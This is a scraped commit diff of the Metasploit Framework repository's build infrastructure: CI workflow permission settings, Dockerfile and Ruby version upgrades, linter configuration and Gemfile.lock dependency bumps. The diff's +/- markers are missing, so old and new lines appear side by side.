You can click on the big blue button at [Rapid7's Vulnerability
You can click on the big orange button at [Rapid7's Vulnerability
Disclosure][r7-vulns] page, which will get you to our general
vulnerability reporting system. While this does require a (free) ZenDesk
account to use, you'll get regular updates on your issue as our software
+59
View File
@@ -0,0 +1,59 @@
name: Build Docs
# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
permissions:
actions: none
checks: none
contents: none
deployments: none
id-token: none
issues: none
discussions: none
packages: none
pages: none
pull-requests: none
repository-projects: none
security-events: none
statuses: none
on:
push:
branches-ignore:
- gh-pages
- metakitty
- weekly-dependency-updates
paths:
- docs
pull_request:
branches-ignore:
- weekly-dependency-updates
jobs:
# Ensures that the docs site builds successfully. Note that this workflow does not deploy the docs site.
build:
runs-on: ubuntu-18.04
timeout-minutes: 40
strategy:
fail-fast: true
matrix:
ruby:
- 2.7
name: Ruby ${{ matrix.ruby }}
steps:
- name: Checkout code
uses: actions/checkout@v2
- name: Setup Ruby
uses: ruby/setup-ruby@v1
with:
ruby-version: ${{ matrix.ruby }}
bundler-cache: true
working-directory: docs
- name: build
working-directory: docs
run: |
bundle exec ruby build.rb
bundle exec ruby build.rb --production
+22 -19
View File
@@ -1,4 +1,23 @@
name: Labels
# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
permissions:
actions: none
checks: none
contents: none
deployments: none
id-token: none
# This action can update/close issues
issues: write
discussions: none
packages: none
pages: none
# This action can update/close pull requests
pull-requests: write
repository-projects: none
security-events: none
statuses: none
on:
pull_request_target:
types: [labeled]
@@ -124,19 +143,12 @@ jobs:
},
},
issues: {
// Termux issues are usually user error. However they may describe issues within modules/framework itself,
// and for this reason they are not closed automatically.
termux: {
close: false,
close: true,
comment: `
Termux is not officially supported. https://github.com/rapid7/metasploit-framework/issues/11023
Metasploit installation on Termux is not supported. Refer to the following for more information:
However, Metasploit reportedly does work with Termux.
Refer to the following for more information:
* https://wiki.termux.com/wiki/Metasploit_Framework
* termux/termux-packages/issues/715
* https://github.com/rapid7/metasploit-framework/issues/11023
`
},
// Used for issues that have had low effort applied, haven't followed the issue template, and there's not enough
@@ -179,15 +191,6 @@ jobs:
Closing this issue. If you believe this issue has been closed in error, please provide any relevant output and logs which may be useful in diagnosing the issue.
`
},
'ruby-3.0.0': {
close: true,
comment: `
This issue appears to be related to Ruby 3.0.0. At this time Metasploit does not support Ruby 3.0.0.
Please try using Ruby 2.7.x with Metasploit.
Closing this issue as a duplicate of #14666 - which aims to track this feature request.
`
},
}
};
+24 -22
View File
@@ -1,24 +1,41 @@
name: Lint
# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
permissions:
actions: none
checks: none
contents: none
deployments: none
id-token: none
issues: none
discussions: none
packages: none
pages: none
pull-requests: none
repository-projects: none
security-events: none
statuses: none
on:
push:
branches-ignore:
- gh-pages
- metakitty
- weekly-dependency-updates
pull_request:
branches:
- '*'
branches-ignore:
- weekly-dependency-updates
jobs:
msftidy:
runs-on: ubuntu-16.04
runs-on: ubuntu-18.04
timeout-minutes: 40
strategy:
fail-fast: true
matrix:
ruby:
- 2.5
- 2.6
name: Lint msftidy
steps:
@@ -32,27 +49,12 @@ jobs:
with:
fetch-depth: 0
- uses: actions/setup-ruby@v1
- uses: ruby/setup-ruby@v1
with:
ruby-version: ${{ matrix.ruby }}
- name: Setup bundler
run: |
gem install bundler
- uses: actions/cache@v2
with:
path: vendor/bundle
key: ${{ runner.os }}-gems-${{ hashFiles('**/Gemfile.lock') }}
restore-keys: |
${{ runner.os }}-gems-
- name: Bundle install
run: |
bundle config path vendor/bundle
bundle install --jobs 4 --retry 3
bundler-cache: true
env:
BUNDLER_WITHOUT: coverage development pcap
BUNDLE_WITHOUT: "coverage development pcap"
- name: Run msftidy
run: |
+20 -1
View File
@@ -1,7 +1,26 @@
# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
permissions:
actions: none
checks: none
contents: none
deployments: none
id-token: none
# This action can update/close issues
issues: write
discussions: none
packages: none
pages: none
pull-requests: none
repository-projects: none
security-events: none
statuses: none
on:
schedule:
- cron: "0 15 * * 1-5"
name: Stale Bot workflow
jobs:
build:
name: stale
@@ -32,5 +51,5 @@ jobs:
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
exempt-issue-labels: |
not-stale,confirmed,easy,newbie-friendly,suggestion,suggestion-module,suggestion-feature,suggestion-docs,ascii-utf8-issues,database,feature,enhancement,library
discussion,not-stale,confirmed,easy,newbie-friendly,suggestion,suggestion-module,suggestion-feature,suggestion-docs,ascii-utf8-issues,database,feature,enhancement,library
debug-only: false
+28 -24
View File
@@ -1,17 +1,34 @@
name: Verify
# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
permissions:
actions: none
checks: none
contents: none
deployments: none
id-token: none
issues: none
discussions: none
packages: none
pages: none
pull-requests: none
repository-projects: none
security-events: none
statuses: none
on:
push:
branches-ignore:
- gh-pages
- metakitty
- weekly-dependency-updates
pull_request:
branches:
- '*'
branches-ignore:
- weekly-dependency-updates
jobs:
build:
runs-on: ubuntu-16.04
runs-on: ubuntu-18.04
timeout-minutes: 40
name: Docker Build
steps:
@@ -27,7 +44,7 @@ jobs:
/usr/bin/docker-compose build
test:
runs-on: ubuntu-16.04
runs-on: ubuntu-18.04
timeout-minutes: 40
services:
@@ -47,9 +64,10 @@ jobs:
fail-fast: true
matrix:
ruby:
- 2.5
- 2.6
- 2.7
- 3.0.3
- 3.1.1
test_cmd:
- bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"
- bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content"
@@ -68,27 +86,13 @@ jobs:
- name: Checkout code
uses: actions/checkout@v2
- uses: actions/setup-ruby@v1
- name: Setup Ruby
env:
BUNDLE_WITHOUT: "coverage development pcap"
uses: ruby/setup-ruby@v1
with:
ruby-version: ${{ matrix.ruby }}
- name: Setup bundler
run: |
gem install bundler
- uses: actions/cache@v2
with:
path: vendor/bundle
key: ${{ runner.os }}-gems-${{ hashFiles('**/Gemfile.lock') }}
restore-keys: |
${{ runner.os }}-gems-
- name: Bundle install
run: |
bundle config path vendor/bundle
bundle install --jobs 4 --retry 3
env:
BUNDLER_WITHOUT: coverage development pcap
bundler-cache: true
- name: Create database
run: |
@@ -0,0 +1,69 @@
# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
permissions:
actions: none
checks: none
contents: none
deployments: none
id-token: none
# This action can update/close issues
issues: write
discussions: none
packages: none
pages: none
pull-requests: write
repository-projects: none
security-events: none
statuses: none
on:
push:
branches:
- weekly-dependency-updates
paths:
- 'Gemfile.lock'
name: Weekly dependency PR workflow
jobs:
create-pull-request:
runs-on: ubuntu-latest
steps:
- name: Create Pull Request
uses: actions/github-script@v6
with:
script: |
const { repo, owner } = context.repo;
console.log('repo:');
console.log(JSON.stringify(repo, null, 4));
console.log('owner:');
console.log(JSON.stringify(owner, null, 4));
const hasPR = await github.rest.pulls.list({
owner,
repo,
head: owner + ':' + '${{ github.ref_name }}'
});
console.log('hasPR:');
console.log(JSON.stringify({ data: hasPR.data, status: hasPR.status }, null, 4));
if (Array.isArray(hasPR.data) && !hasPR.data.length) {
const result = await github.rest.pulls.create({
title: 'Weekly dependency updates',
owner,
repo,
head: '${{ github.ref_name }}',
base: 'master',
body: [
'This PR is auto-generated by [actions/github-script](https://github.com/actions/github-script). ',
'`bundle update` revealed the following gems have new version to be evaluated for update.'
].join('\n')
});
console.log('result:');
console.log(JSON.stringify({ data: result.data, status: result.status }, null, 4));
const labelResult = await github.rest.issues.addLabels({
owner,
repo,
issue_number: result.data.number,
labels: ['automation', 'rn-no-release-notes']
});
console.log('labelResult:');
console.log(JSON.stringify({ data: labelResult.data, status: labelResult.status }, null, 4));
}
+3 -2
View File
@@ -21,6 +21,8 @@ Gemfile.local.lock
config/database.yml
# target config file for testing
features/support/targets.yml
# Generated test files
spec/dummy
# simplecov coverage data
coverage
doc/
@@ -94,6 +96,5 @@ docker-compose.local*
*.pyc
rspec.failures
#Ignore any base disk store files
db/modules_metadata_base.pstore
db/modules_metadata_base.pstore
+1
View File
@@ -28,6 +28,7 @@ pdeardorff-r7 <pdeardorff-r7@github> <Paul_Deardorff@rapid7.com>
sgonzalez-r7 <sgonzalez-r7@github> <sgonzalez@rapid7.com>
sgonzalez-r7 <sgonzalez-r7@github> <sonny_gonzalez@rapid7.com>
shuckins-r7 <shuckins-r7@github> <samuel_huckins@rapid7.com>
sjanusz-r7 <sjanusz-r7@github> <simon_janusz@rapid7.com>
smcintyre-r7 <smcintyre-r7@github> <spencer_mcintyre@rapid7.com>
space-r7 <space-r7@github> <shelby_pace@rapid7.com>
tdoan-r7 <tdoan-r7@github> <thao_doan@rapid7.com>
+15 -1
View File
@@ -9,17 +9,19 @@
# inherit_from: .rubocop_todo.yml
AllCops:
TargetRubyVersion: 2.5
TargetRubyVersion: 2.6
SuggestExtensions: false
NewCops: disable
require:
- ./lib/rubocop/cop/layout/module_hash_on_new_line.rb
- ./lib/rubocop/cop/layout/module_hash_values_on_same_line.rb
- ./lib/rubocop/cop/layout/module_description_indentation.rb
- ./lib/rubocop/cop/layout/extra_spacing_with_bindata_ignored.rb
- ./lib/rubocop/cop/lint/module_disclosure_date_format.rb
- ./lib/rubocop/cop/lint/module_disclosure_date_present.rb
- ./lib/rubocop/cop/lint/deprecated_gem_version.rb
- ./lib/rubocop/cop/lint/module_enforce_notes.rb
Layout/SpaceBeforeBrackets:
Description: >-
@@ -147,6 +149,9 @@ Style/SwapValues:
Layout/ModuleHashOnNewLine:
Enabled: true
Layout/ModuleHashValuesOnSameLine:
Enabled: true
Layout/ModuleDescriptionIndentation:
Enabled: true
@@ -158,6 +163,13 @@ Lint/ModuleDisclosureDatePresent:
# Only exploits require disclosure dates, but they can be present in auxiliary modules etc.
- 'modules/exploits/**/*'
Lint/ModuleEnforceNotes:
Include:
# Only exploits and auxiliary modules require SideEffects to be listed.
- 'modules/exploits/**/*'
- 'modules/auxiliary/**/*'
- 'modules/post/**/*'
Lint/DeprecatedGemVersion:
Enabled: true
Exclude:
@@ -168,6 +180,7 @@ Metrics/ClassLength:
Enabled: true
Exclude:
- 'modules/**/*'
- 'test/modules/**/*'
Style/ClassAndModuleChildren:
Enabled: false
@@ -245,6 +258,7 @@ Style/Documentation:
Description: 'Most Metasploit modules do not have class documentation.'
Exclude:
- 'modules/**/*'
- 'test/modules/**/*'
- 'spec/file_fixtures/modules/**/*'
Layout/FirstArgumentIndentation:
+1 -1
View File
@@ -1 +1 @@
2.7.2
3.0.2
+21 -3
View File
@@ -1,8 +1,9 @@
FROM ruby:2.7.2-alpine3.12 AS builder
FROM ruby:3.0.2-alpine3.12 AS builder
LABEL maintainer="Rapid7"
ARG BUNDLER_CONFIG_ARGS="set clean 'true' set no-cache 'true' set system 'true' set without 'development test coverage'"
ENV APP_HOME=/usr/src/metasploit-framework
ENV TOOLS_HOME=/usr/src/tools
ENV BUNDLE_IGNORE_MESSAGES="true"
WORKDIR $APP_HOME
@@ -13,8 +14,10 @@ COPY lib/msf/util/helper.rb $APP_HOME/lib/msf/util/helper.rb
RUN apk add --no-cache \
autoconf \
bash \
bison \
build-base \
curl \
ruby-dev \
openssl-dev \
readline-dev \
@@ -27,6 +30,7 @@ RUN apk add --no-cache \
zlib-dev \
ncurses-dev \
git \
go \
&& echo "gem: --no-document" > /etc/gemrc \
&& gem update --system \
&& bundle config $BUNDLER_ARGS \
@@ -36,18 +40,26 @@ RUN apk add --no-cache \
# needed so non root users can read content of the bundle
&& chmod -R a+r /usr/local/bundle
RUN mkdir -p $TOOLS_HOME/bin && \
cd $TOOLS_HOME/bin && \
curl -O https://dl.google.com/go/go1.11.2.src.tar.gz && \
tar -zxf go1.11.2.src.tar.gz && \
rm go1.11.2.src.tar.gz && \
cd go/src && \
./make.bash
FROM ruby:2.7.2-alpine3.12
FROM ruby:3.0.2-alpine3.12
LABEL maintainer="Rapid7"
ENV APP_HOME=/usr/src/metasploit-framework
ENV TOOLS_HOME=/usr/src/tools
ENV NMAP_PRIVILEGED=""
ENV METASPLOIT_GROUP=metasploit
# used for the copy command
RUN addgroup -S $METASPLOIT_GROUP
RUN apk add --no-cache bash sqlite-libs nmap nmap-scripts nmap-nselibs postgresql-libs python2 python3 ncurses libcap su-exec alpine-sdk python2-dev openssl-dev nasm
RUN apk add --no-cache bash sqlite-libs nmap nmap-scripts nmap-nselibs postgresql-libs python2 python3 py3-pip ncurses libcap su-exec alpine-sdk python2-dev openssl-dev nasm mingw-w64-gcc
RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap)
@@ -55,12 +67,18 @@ RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap)
COPY --from=builder /usr/local/bundle /usr/local/bundle
RUN chown -R root:metasploit /usr/local/bundle
COPY . $APP_HOME/
COPY --from=builder $TOOLS_HOME $TOOLS_HOME
RUN chown -R root:metasploit $APP_HOME/
RUN chmod 664 $APP_HOME/Gemfile.lock
RUN gem update --system
RUN cp -f $APP_HOME/docker/database.yml $APP_HOME/config/database.yml
RUN curl -L -O https://github.com/pypa/get-pip/raw/3843bff3a0a61da5b63ea0b7d34794c5c51a2f11/get-pip.py && python get-pip.py && rm get-pip.py
RUN pip install impacket
RUN pip install requests
ENV GOPATH=$TOOLS_HOME/go
ENV GOROOT=$TOOLS_HOME/bin/go
ENV PATH=${PATH}:${GOPATH}/bin:${GOROOT}/bin
WORKDIR $APP_HOME
+1
View File
@@ -45,3 +45,4 @@ group :test do
# Manipulate Time.now in specs
gem 'timecop'
end
+209 -179
View File
@@ -1,10 +1,10 @@
PATH
remote: .
specs:
metasploit-framework (6.0.48)
actionpack (~> 5.2.2)
activerecord (~> 5.2.2)
activesupport (~> 5.2.2)
metasploit-framework (6.2.2)
actionpack (~> 6.0)
activerecord (~> 6.0)
activesupport (~> 6.0)
aws-sdk-ec2
aws-sdk-iam
aws-sdk-s3
@@ -18,24 +18,26 @@ PATH
eventmachine
faker
faraday
faraday-retry
faye-websocket
filesize
hrr_rb_ssh (= 0.3.0.pre2)
hrr_rb_ssh-ed25519
http-cookie
irb
jsobfu
json
metasm
metasploit-concern (~> 3.0.0)
metasploit-credential (~> 4.0.0)
metasploit-model (~> 3.1.0)
metasploit-payloads (= 2.0.47)
metasploit_data_models (~> 4.1.0)
metasploit_payloads-mettle (= 1.0.10)
metasploit-concern
metasploit-credential
metasploit-model
metasploit-payloads (= 2.0.93)
metasploit_data_models
metasploit_payloads-mettle (= 1.0.18)
mqtt
msgpack
nessus_rest
net-ldap
net-smtp
net-ssh
network_interface
nexpose
@@ -53,6 +55,7 @@ PATH
rb-readline
recog
redcarpet
reline (= 0.2.5)
rex-arch
rex-bin_tools
rex-core
@@ -72,7 +75,7 @@ PATH
rex-text
rex-zip
ruby-macho
ruby_smb (~> 2.0)
ruby_smb (~> 3.1.0)
rubyntlm
rubyzip
sinatra
@@ -82,8 +85,11 @@ PATH
thin
tzinfo
tzinfo-data
unix-crypt
warden
win32api
windows_error
winrm
xdr
xmlrpc
zeitwerk
@@ -92,77 +98,77 @@ GEM
remote: https://rubygems.org/
specs:
Ascii85 (1.1.0)
actionpack (5.2.6)
actionview (= 5.2.6)
activesupport (= 5.2.6)
rack (~> 2.0, >= 2.0.8)
actionpack (6.1.6)
actionview (= 6.1.6)
activesupport (= 6.1.6)
rack (~> 2.0, >= 2.0.9)
rack-test (>= 0.6.3)
rails-dom-testing (~> 2.0)
rails-html-sanitizer (~> 1.0, >= 1.0.2)
actionview (5.2.6)
activesupport (= 5.2.6)
rails-html-sanitizer (~> 1.0, >= 1.2.0)
actionview (6.1.6)
activesupport (= 6.1.6)
builder (~> 3.1)
erubi (~> 1.4)
rails-dom-testing (~> 2.0)
rails-html-sanitizer (~> 1.0, >= 1.0.3)
activemodel (5.2.6)
activesupport (= 5.2.6)
activerecord (5.2.6)
activemodel (= 5.2.6)
activesupport (= 5.2.6)
arel (>= 9.0)
activesupport (5.2.6)
rails-html-sanitizer (~> 1.1, >= 1.2.0)
activemodel (6.1.6)
activesupport (= 6.1.6)
activerecord (6.1.6)
activemodel (= 6.1.6)
activesupport (= 6.1.6)
activesupport (6.1.6)
concurrent-ruby (~> 1.0, >= 1.0.2)
i18n (>= 0.7, < 2)
minitest (~> 5.1)
tzinfo (~> 1.1)
addressable (2.7.0)
i18n (>= 1.6, < 2)
minitest (>= 5.1)
tzinfo (~> 2.0)
zeitwerk (~> 2.3)
addressable (2.8.0)
public_suffix (>= 2.0.2, < 5.0)
afm (0.2.2)
arel (9.0.0)
arel-helpers (2.12.0)
activerecord (>= 3.1.0, < 7)
arel-helpers (2.14.0)
activerecord (>= 3.1.0, < 8)
ast (2.4.2)
aws-eventstream (1.1.1)
aws-partitions (1.466.0)
aws-sdk-core (3.114.2)
aws-eventstream (1.2.0)
aws-partitions (1.595.0)
aws-sdk-core (3.131.1)
aws-eventstream (~> 1, >= 1.0.2)
aws-partitions (~> 1, >= 1.239.0)
aws-partitions (~> 1, >= 1.525.0)
aws-sigv4 (~> 1.1)
jmespath (~> 1.0)
aws-sdk-ec2 (1.240.0)
aws-sdk-core (~> 3, >= 3.112.0)
jmespath (~> 1, >= 1.6.1)
aws-sdk-ec2 (1.317.0)
aws-sdk-core (~> 3, >= 3.127.0)
aws-sigv4 (~> 1.1)
aws-sdk-iam (1.55.0)
aws-sdk-core (~> 3, >= 3.112.0)
aws-sdk-iam (1.68.0)
aws-sdk-core (~> 3, >= 3.127.0)
aws-sigv4 (~> 1.1)
aws-sdk-kms (1.43.0)
aws-sdk-core (~> 3, >= 3.112.0)
aws-sdk-kms (1.57.0)
aws-sdk-core (~> 3, >= 3.127.0)
aws-sigv4 (~> 1.1)
aws-sdk-s3 (1.96.0)
aws-sdk-core (~> 3, >= 3.112.0)
aws-sdk-s3 (1.114.0)
aws-sdk-core (~> 3, >= 3.127.0)
aws-sdk-kms (~> 1)
aws-sigv4 (~> 1.1)
aws-sigv4 (1.2.3)
aws-sigv4 (~> 1.4)
aws-sigv4 (1.5.0)
aws-eventstream (~> 1, >= 1.0.2)
bcrypt (3.1.16)
bcrypt (3.1.18)
bcrypt_pbkdf (1.1.0)
bindata (2.4.10)
bson (4.12.1)
bson (4.15.0)
builder (3.2.4)
byebug (11.1.3)
coderay (1.1.3)
concurrent-ruby (1.0.5)
cookiejar (0.3.3)
crass (1.0.6)
daemons (1.4.0)
diff-lcs (1.4.4)
dnsruby (1.61.5)
daemons (1.4.1)
diff-lcs (1.5.0)
digest (3.1.0)
dnsruby (1.61.9)
simpleidn (~> 0.1)
docile (1.4.0)
domain_name (0.5.20190701)
unf (>= 0.0.5, < 1.0.0)
ed25519 (1.2.4)
ed25519 (1.3.0)
em-http-request (1.1.7)
addressable (>= 2.3.4)
cookiejar (!= 0.3.1)
@@ -173,167 +179,179 @@ GEM
eventmachine (>= 1.0.0.beta.4)
erubi (1.10.0)
eventmachine (1.2.7)
factory_bot (6.2.0)
factory_bot (6.2.1)
activesupport (>= 5.0.0)
factory_bot_rails (6.2.0)
factory_bot (~> 6.2.0)
railties (>= 5.0.0)
faker (2.18.0)
i18n (>= 1.6, < 2)
faraday (1.4.2)
faraday-em_http (~> 1.0)
faraday-em_synchrony (~> 1.0)
faraday-excon (~> 1.1)
faraday-net_http (~> 1.0)
faraday-net_http_persistent (~> 1.1)
multipart-post (>= 1.2, < 3)
faker (2.21.0)
i18n (>= 1.8.11, < 2)
faraday (2.3.0)
faraday-net_http (~> 2.0)
ruby2_keywords (>= 0.0.4)
faraday-em_http (1.0.0)
faraday-em_synchrony (1.0.0)
faraday-excon (1.1.0)
faraday-net_http (1.0.1)
faraday-net_http_persistent (1.1.0)
faraday-net_http (2.0.3)
faraday-retry (1.0.3)
faye-websocket (0.11.1)
eventmachine (>= 0.12.0)
websocket-driver (>= 0.5.1)
ffi (1.15.5)
filesize (0.2.0)
fivemat (1.3.7)
gssapi (1.3.1)
ffi (>= 1.0.1)
gyoku (1.4.0)
builder (>= 2.1.2)
rexml (~> 3.0)
hashery (2.1.2)
hrr_rb_ssh (0.3.0.pre2)
hrr_rb_ssh (0.4.2)
hrr_rb_ssh-ed25519 (0.4.2)
ed25519 (~> 1.2)
http-cookie (1.0.4)
hrr_rb_ssh (>= 0.4)
http-cookie (1.0.5)
domain_name (~> 0.5)
http_parser.rb (0.6.0)
i18n (1.8.10)
http_parser.rb (0.8.0)
httpclient (2.8.3)
i18n (1.10.0)
concurrent-ruby (~> 1.0)
io-console (0.5.9)
irb (1.3.5)
reline (>= 0.1.5)
jmespath (1.4.0)
io-console (0.5.11)
irb (1.3.6)
reline (>= 0.2.5)
jmespath (1.6.1)
jsobfu (0.4.2)
rkelly-remix
json (2.5.1)
loofah (2.9.1)
json (2.6.2)
little-plugger (1.1.4)
logging (2.3.1)
little-plugger (~> 1.1)
multi_json (~> 1.14)
loofah (2.18.0)
crass (~> 1.0.2)
nokogiri (>= 1.5.9)
memory_profiler (1.0.0)
metasm (1.0.4)
metasploit-concern (3.0.2)
activemodel (~> 5.2.2)
activesupport (~> 5.2.2)
railties (~> 5.2.2)
metasploit-credential (4.0.5)
metasm (1.0.5)
metasploit-concern (4.0.4)
activemodel (~> 6.0)
activesupport (~> 6.0)
railties (~> 6.0)
metasploit-credential (5.0.7)
metasploit-concern
metasploit-model
metasploit_data_models (>= 3.0.0)
metasploit_data_models (>= 5.0.0)
net-ssh
pg
railties
rex-socket
rubyntlm
rubyzip
metasploit-model (3.1.4)
activemodel (~> 5.2.2)
activesupport (~> 5.2.2)
railties (~> 5.2.2)
metasploit-payloads (2.0.47)
metasploit_data_models (4.1.4)
activerecord (~> 5.2.2)
activesupport (~> 5.2.2)
metasploit-model (4.0.4)
activemodel (~> 6.0)
activesupport (~> 6.0)
railties (~> 6.0)
metasploit-payloads (2.0.93)
metasploit_data_models (5.0.5)
activerecord (~> 6.0)
activesupport (~> 6.0)
arel-helpers
metasploit-concern
metasploit-model (>= 3.1)
pg
railties (~> 5.2.2)
railties (~> 6.0)
recog (~> 2.0)
webrick
metasploit_payloads-mettle (1.0.10)
metasploit_payloads-mettle (1.0.18)
method_source (1.0.0)
mini_portile2 (2.5.3)
minitest (5.14.4)
mini_portile2 (2.8.0)
minitest (5.15.0)
mqtt (0.5.0)
msgpack (1.4.2)
multipart-post (2.1.1)
msgpack (1.5.2)
multi_json (1.15.0)
mustermann (1.1.1)
ruby2_keywords (~> 0.0.1)
nessus_rest (0.1.6)
net-ldap (0.17.0)
net-protocol (0.1.3)
timeout
net-smtp (0.3.1)
digest
net-protocol
timeout
net-ssh (6.1.0)
network_interface (0.0.2)
nexpose (7.3.0)
nio4r (2.5.7)
nokogiri (1.11.7)
mini_portile2 (~> 2.5.0)
nio4r (2.5.8)
nokogiri (1.13.6)
mini_portile2 (~> 2.8.0)
racc (~> 1.4)
octokit (4.21.0)
faraday (>= 0.9)
sawyer (~> 0.8.0, >= 0.5.3)
nori (2.6.0)
octokit (4.23.0)
faraday (>= 1, < 3)
sawyer (~> 0.9)
openssl-ccm (1.2.2)
openssl-cmac (2.0.1)
openvas-omp (0.0.4)
packetfu (1.1.13)
pcaprub
parallel (1.20.1)
parser (3.0.1.1)
parallel (1.22.1)
parser (3.1.2.0)
ast (~> 2.4.1)
patch_finder (1.0.2)
pcaprub (0.13.0)
pdf-reader (2.5.0)
pcaprub (0.13.1)
pdf-reader (2.10.0)
Ascii85 (~> 1.0)
afm (~> 0.2.1)
hashery (~> 2.0)
ruby-rc4
ttfunk
pg (1.2.3)
pg (1.3.5)
pry (0.13.1)
coderay (~> 1.1)
method_source (~> 1.0)
pry-byebug (3.9.0)
byebug (~> 11.0)
pry (~> 0.13.0)
public_suffix (4.0.6)
puma (5.3.2)
public_suffix (4.0.7)
puma (5.6.4)
nio4r (~> 2.0)
racc (1.5.2)
rack (2.2.3)
rack-protection (2.1.0)
racc (1.6.0)
rack (2.2.3.1)
rack-protection (2.2.0)
rack
rack-test (1.1.0)
rack (>= 1.0, < 3)
rails-dom-testing (2.0.3)
activesupport (>= 4.2.0)
nokogiri (>= 1.6)
rails-html-sanitizer (1.3.0)
rails-html-sanitizer (1.4.2)
loofah (~> 2.3)
railties (5.2.6)
actionpack (= 5.2.6)
activesupport (= 5.2.6)
railties (6.1.6)
actionpack (= 6.1.6)
activesupport (= 6.1.6)
method_source
rake (>= 0.8.7)
thor (>= 0.19.0, < 2.0)
rainbow (3.0.0)
rake (13.0.3)
rake (>= 12.2)
thor (~> 1.0)
rainbow (3.1.1)
rake (13.0.6)
rb-readline (0.5.5)
recog (2.3.20)
recog (2.3.23)
nokogiri
redcarpet (3.5.1)
regexp_parser (2.1.1)
regexp_parser (2.5.0)
reline (0.2.5)
io-console (~> 0.5)
rex-arch (0.1.14)
rex-text
rex-bin_tools (0.1.7)
rex-bin_tools (0.1.8)
metasm
rex-arch
rex-core
rex-struct2
rex-text
rex-core (0.1.16)
rex-encoder (0.1.5)
rex-core (0.1.28)
rex-encoder (0.1.6)
metasm
rex-arch
rex-text
rex-exploitation (0.1.27)
rex-exploitation (0.1.30)
jsobfu
metasm
rex-arch
@@ -341,48 +359,48 @@ GEM
rex-text
rexml
rex-java (0.1.6)
rex-mime (0.1.6)
rex-mime (0.1.7)
rex-text
rex-nop (0.1.2)
rex-arch
rex-ole (0.1.7)
rex-text
rex-powershell (0.1.90)
rex-powershell (0.1.96)
rex-random_identifier
rex-text
ruby-rc4
rex-random_identifier (0.1.5)
rex-random_identifier (0.1.8)
rex-text
rex-registry (0.1.4)
rex-rop_builder (0.1.4)
metasm
rex-core
rex-text
rex-socket (0.1.29)
rex-socket (0.1.39)
rex-core
rex-sslscan (0.1.6)
rex-sslscan (0.1.7)
rex-core
rex-socket
rex-text
rex-struct2 (0.1.3)
rex-text (0.2.34)
rex-text (0.2.37)
rex-zip (0.1.4)
rex-text
rexml (3.2.5)
rkelly-remix (0.0.7)
rspec (3.10.0)
rspec-core (~> 3.10.0)
rspec-expectations (~> 3.10.0)
rspec-mocks (~> 3.10.0)
rspec-core (3.10.1)
rspec-support (~> 3.10.0)
rspec-expectations (3.10.1)
rspec (3.11.0)
rspec-core (~> 3.11.0)
rspec-expectations (~> 3.11.0)
rspec-mocks (~> 3.11.0)
rspec-core (3.11.0)
rspec-support (~> 3.11.0)
rspec-expectations (3.11.0)
diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.10.0)
rspec-mocks (3.10.2)
rspec-support (~> 3.11.0)
rspec-mocks (3.11.1)
diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.10.0)
rspec-rails (5.0.1)
rspec-support (~> 3.11.0)
rspec-rails (5.1.2)
actionpack (>= 5.2)
activesupport (>= 5.2)
railties (>= 5.2)
@@ -392,44 +410,44 @@ GEM
rspec-support (~> 3.10)
rspec-rerun (1.1.0)
rspec (~> 3.0)
rspec-support (3.10.2)
rubocop (1.16.0)
rspec-support (3.11.0)
rubocop (1.30.0)
parallel (~> 1.10)
parser (>= 3.0.0.0)
parser (>= 3.1.0.0)
rainbow (>= 2.2.2, < 4.0)
regexp_parser (>= 1.8, < 3.0)
rexml
rubocop-ast (>= 1.7.0, < 2.0)
rexml (>= 3.2.5, < 4.0)
rubocop-ast (>= 1.18.0, < 2.0)
ruby-progressbar (~> 1.7)
unicode-display_width (>= 1.4.0, < 3.0)
rubocop-ast (1.7.0)
parser (>= 3.0.1.1)
ruby-macho (2.5.1)
rubocop-ast (1.18.0)
parser (>= 3.1.1.0)
ruby-macho (3.0.0)
ruby-prof (1.4.2)
ruby-progressbar (1.11.0)
ruby-rc4 (0.1.5)
ruby2_keywords (0.0.4)
ruby_smb (2.0.10)
ruby2_keywords (0.0.5)
ruby_smb (3.1.3)
bindata
openssl-ccm
openssl-cmac
rubyntlm
windows_error
windows_error (>= 0.1.4)
rubyntlm (0.6.3)
rubyzip (2.3.0)
sawyer (0.8.2)
rubyzip (2.3.2)
sawyer (0.9.1)
addressable (>= 2.3.5)
faraday (> 0.8, < 2.0)
faraday (>= 0.17.3, < 3)
simplecov (0.18.2)
docile (~> 1.1)
simplecov-html (~> 0.11)
simplecov-html (0.12.3)
simpleidn (0.2.1)
unf (~> 0.1.4)
sinatra (2.1.0)
sinatra (2.2.0)
mustermann (~> 1.0)
rack (~> 2.2)
rack-protection (= 2.1.0)
rack-protection (= 2.2.0)
tilt (~> 2.0)
sqlite3 (1.4.2)
sshkey (2.0.0)
@@ -438,33 +456,45 @@ GEM
daemons (~> 1.0, >= 1.0.9)
eventmachine (~> 1.0, >= 1.0.4)
rack (>= 1, < 3)
thor (1.1.0)
thread_safe (0.3.6)
thor (1.2.1)
tilt (2.0.10)
timecop (0.9.4)
timecop (0.9.5)
timeout (0.3.0)
ttfunk (1.7.0)
tzinfo (1.2.9)
thread_safe (~> 0.1)
tzinfo-data (1.2021.1)
tzinfo (2.0.4)
concurrent-ruby (~> 1.0)
tzinfo-data (1.2022.1)
tzinfo (>= 1.0.0)
unf (0.1.4)
unf_ext
unf_ext (0.0.7.7)
unicode-display_width (2.0.0)
unf_ext (0.0.8.2)
unicode-display_width (2.1.0)
unix-crypt (1.3.0)
warden (1.2.9)
rack (>= 2.0.9)
webrick (1.7.0)
websocket-driver (0.7.4)
websocket-driver (0.7.5)
websocket-extensions (>= 0.1.0)
websocket-extensions (0.1.5)
windows_error (0.1.2)
xdr (3.0.2)
activemodel (>= 4.2, < 7.0)
activesupport (>= 4.2, < 7.0)
